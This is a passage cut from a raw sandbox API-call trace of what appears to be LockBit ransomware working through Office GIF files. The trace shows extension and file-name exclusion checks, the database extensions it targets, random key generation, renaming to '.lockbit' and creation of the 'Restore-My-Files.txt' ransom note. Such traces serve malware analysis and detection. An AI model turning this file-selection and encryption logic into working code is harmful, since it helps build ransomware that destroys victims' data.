RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.537] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.537] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.537] free (_Block=0x1fa2ed8) [0204.537] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.537] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.538] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.538] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88d68800, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce611c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x88d68800, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21375_.GIF", cAlternateFileName="")) returned 1 [0204.538] lstrcmpiW (lpString1=".", lpString2="BD21375_.GIF") returned -1 [0204.538] lstrcmpiW (lpString1="..", lpString2="BD21375_.GIF") returned -1 [0204.538] PathFindExtensionW (pszPath="BD21375_.GIF") returned=".GIF" [0204.538] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.538] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.538] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.538] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.538] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.538] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.538] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.538] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.539] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.539] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.540] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21375_.GIF") returned 1 [0204.540] lstrcmpiW (lpString1="ntldr", lpString2="BD21375_.GIF") returned 1 [0204.540] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21375_.GIF") returned 1 [0204.540] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21375_.GIF") returned 1 [0204.540] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21375_.GIF") returned -1 [0204.540] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21375_.GIF") returned 1 [0204.540] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21375_.GIF") returned 1 [0204.540] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.540] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF") returned=".GIF" [0204.540] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.540] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.540] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.540] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.540] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.541] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.541] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.541] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF.lockbit") returned 78 [0204.541] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21375_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.543] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.543] malloc (_Size=0x40068) returned 0x3df0008 [0204.543] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=212) returned 1 [0204.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.544] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.544] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.548] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.548] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.548] free (_Block=0x1fa2ed8) [0204.548] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21375_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.548] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.548] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.548] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a07b500, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce611c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8a07b500, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21376_.GIF", cAlternateFileName="")) returned 1 [0204.548] lstrcmpiW (lpString1=".", lpString2="BD21376_.GIF") returned -1 [0204.548] lstrcmpiW (lpString1="..", lpString2="BD21376_.GIF") returned -1 [0204.548] PathFindExtensionW (pszPath="BD21376_.GIF") returned=".GIF" [0204.548] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.548] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.548] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.548] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.548] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.548] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.548] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.548] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.549] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.549] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21376_.GIF") returned 1 [0204.550] lstrcmpiW (lpString1="ntldr", lpString2="BD21376_.GIF") returned 1 [0204.550] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21376_.GIF") returned 1 [0204.550] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21376_.GIF") returned 1 [0204.550] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21376_.GIF") returned -1 [0204.550] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21376_.GIF") returned 1 [0204.550] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21376_.GIF") returned 1 [0204.550] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.550] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF") returned=".GIF" [0204.550] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.550] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.550] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.551] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.551] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.551] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.551] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.551] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.551] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.551] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.551] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF.lockbit") returned 78 [0204.551] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21376_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.553] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.553] malloc (_Size=0x40068) returned 0x3df0008 [0204.553] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=180) returned 1 [0204.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.554] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.559] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.559] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.559] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.559] free (_Block=0x1fa2ed8) [0204.559] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21376_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.559] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.559] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a07b500, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce611c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8a07b500, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21377_.GIF", cAlternateFileName="")) returned 1 [0204.559] lstrcmpiW (lpString1=".", lpString2="BD21377_.GIF") returned -1 [0204.559] lstrcmpiW (lpString1="..", lpString2="BD21377_.GIF") returned -1 [0204.559] PathFindExtensionW (pszPath="BD21377_.GIF") returned=".GIF" [0204.559] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.559] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.559] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.559] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.559] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.559] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.559] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.559] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.560] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.561] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.561] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.561] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.561] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.561] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.561] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.561] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.561] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.562] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.562] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.562] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21377_.GIF") returned 1 [0204.562] lstrcmpiW (lpString1="ntldr", lpString2="BD21377_.GIF") returned 1 [0204.562] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21377_.GIF") returned 1 [0204.562] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21377_.GIF") returned 1 [0204.562] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21377_.GIF") returned -1 [0204.562] lstrcmpiW 